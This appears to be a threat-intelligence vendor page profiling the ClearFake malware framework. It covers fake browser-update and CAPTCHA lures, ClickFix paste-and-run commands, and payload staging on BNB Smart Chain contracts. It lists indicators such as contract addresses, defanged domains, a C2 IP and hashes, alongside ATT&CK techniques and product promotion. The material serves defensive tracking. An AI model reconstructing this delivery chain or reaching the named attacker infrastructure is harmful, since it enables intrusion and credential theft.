ClearFake
ClearFake is a malicious JavaScript framework and web-inject activity cluster first observed in 2023 that compromises legitimate websites, often WordPress sites, by injecting malicious HTML and JavaScript. It is used for drive-by and ClickFix-style malware delivery, initially masquerading as fake browser updates and later evolving to fake browser errors, fake Google Chrome update prompts, fake Cloudflare Turnstile pages, and fake reCAPTCHA/CAPTCHA lures. On compromised sites, ClearFake commonly instructs victims to press Win+R, paste a clipboard-staged command, and execute it, leading to PowerShell- or mshta-based infection chains; newer variants abuse SyncAppvPublishingServer.vbs for proxy execution of hidden PowerShell. ClearFake is strongly associated with the EtherHiding technique, using Binance Smart Chain/BNB Smart Chain smart contracts and public RPC endpoints to retrieve staged JavaScript, routing logic, AES keys, lure URLs, commands, and victim-tracking data, which makes takedown and blocking more difficult. Reported behavior includes fetching and executing Base64-encoded and gzip-compressed code, anti-analysis checks for headless browsers, victim fingerprinting by OS/browser and language, and use of separate smart contracts for Windows and macOS payload delivery and infection tracking. Malware delivered by ClearFake in reported campaigns includes Lumma Stealer, Vidar, Stealc, Rhadamanthys, Amadey, IDAT Loader, HijackLoader, Emmenhtal Loader v2, AMOS Stealer, Amatera Stealer/ACR Stealer, SectopRAT, and other loaders or RATs. Proofpoint observed Amatera Stealer delivered via ClearFake website injects in April and May 2025, while Trend Micro reported ClearFake delivering SectopRAT and ACRStealer in 2026. The framework has been associated with threat cluster UNC5142 and is described as a primary user of the EtherHiding loader within the ClickFix ecosystem. Reported scale includes over 9,300 compromised websites identified in February 2025 and public smart-contract tracking suggesting close to 150,000 likely infections since August 2025. High-confidence indicators mentioned in the content include BNB Smart Chain-related wallet/contract addresses such as 0x9179dda8B285040Bf381AABb8a1f4a1b8c37Ed53, 0x53fd54f55C93f9BCCA471cD0CcbaBC3Acbd3E4AA, 0x8FBA1667BEF5EdA433928b220886A830488549BD, 0x80d31D935f0EC978253A26D48B5593599B9542C7, 0xA1decFB75C8C0CA28C10517ce56B710baf727d2e, 0x46790e2Ac7F3CA5a7D1bfCe312d11E91d23383Ff, 0xf4a32588b50a59a82fbA148d436081A48d80832A, and deployer wallet 0xd71f4cdC84420d2bd07F507b7A4F998b4c2d52c9; RPC endpoints including bsc-testnet-rpc.publicnode[.]com, bsc-testnet.drpc[.]org, and data-seed-prebsc-1-s1.bnbchain[.]org:8545; infrastructure and payload indicators including amaprox[.]icu, b1[.]talismanoverblown[.]com, cdn.jsdelivr[.]net/gh/clock-cheking/expert-barnacle/load, put34b.camp, and C2 IP 34.41.139.193; and sample hashes including HTML SHA256 100cff1fb7d791f474d4c1d95428f8ecb2e8961824d7817b473920551da37ae5, DLL SHA256 4a1af31f881671df1ee3d4c3e8c0aa07c1da4aaf8142849543b80962c56839f1, and DLL SHA256 4d22efd2ea58e7643c5b6b82143c8978de7102356346fe4f5357807268cbad5d.
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Groups observed using it
2 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
The CLEARFAKE campaign, associated with the threat cluster UNC5142, functions as a malicious JavaScript framework and often masquerades as a Google Chrome browser update pop-up on compromised websites. The primary function of the embedded JavaScript is to download a payload after a user clicks the "Update Chrome" button.
“VexTrio Viper runs the largest and oldest known TDS with over 165 affiliates including SocGholish and ClearFake.”
Techniques & procedures
18 distinct techniques documented for this family, organized by ATT&CK tactic.
Resource Development
2 techniques
Resource Development
Initial Access
2 techniques
Initial Access
Execution
2 techniques
Execution
Stealth
6 techniques
Stealth
JADESNOW utilizes EtherHiding to fetch, decrypt, and execute malicious payloads from smart contracts on the BNB Smart Chain and Ethereum. The input data stored in the smart contract may be Base64-encoded and XOR-encrypted.
JADESNOW utilizes EtherHiding to fetch, decrypt, and execute malicious payloads from smart contracts on the BNB Smart Chain and Ethereum. The input data stored in the smart contract may be Base64-encoded and XOR-encrypted.
"ChromeSetup.exe downloads and executes the Microsoft Software Installer (MSI) package..." and "switches intended to avoid detection: /qn /quiet /norestart"
This stage performs several environment checks, such as inspecting for headless browser frameworks and evaluating the system’s user-agent string. If automated browsing behavior is detected, the execution chain terminates.
Discovery
4 techniques
Discovery
Fingerprint the victim using the User-Agent: The operating system; The web browser.
This stage performs several environment checks, such as inspecting for headless browser frameworks and evaluating the system’s user-agent string. If automated browsing behavior is detected, the execution chain terminates.
Collection
1 technique
Collection
Command and Control
4 techniques
Command and Control
MITRE ATT&CK™ Matrix - Windows ... Command and Control Standard Application Layer Protocol
Threat actors store data (for example C2 configuration) or code on a public blockchain... they can access it through a legitimate API endpoint... SharkStealer and ArechClient2... pull their C2 configuration from a smart contract... ZigCryptoStealer... uses smart contracts to receive their C2 configuration.
ClearFake fetches and executes base64 encoded and gzip compressed code... The initial smart contract delivers an obfuscated JavaScript payload... dynamically retrieves platform specific second-stage payloads... Java Stealer... continuously monitors the clipboard and further downloads additional payloads.
IOCs tracked for this family
222 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
Recent activity
32 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
A related malicious framework referenced for comparison because it also uses ClickFix-style lures and EtherHiding for malware delivery.
A web-based malware delivery framework that compromises legitimate websites and uses BNB Smart Chain testnet smart contracts to host and retrieve malicious JavaScript, enabling resilient payload delivery and anti-takedown command routing. It uses fake CAPTCHA/ClickFix lures and OS-aware staging to deliver follow-on malware to Windows and macOS victims.
A malware family using EtherHiding to fetch additional JavaScript payloads; it retrieves and executes base64-encoded, gzip-compressed code from smart contracts.
A ClickFix-style JavaScript framework that embeds malicious inline scripts into compromised websites, uses multiple smart contracts and blockchain RPC endpoints for staged delivery, performs environment checks, and serves OS-specific ClickFix prompts and payloads.
The version that knows your environment.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.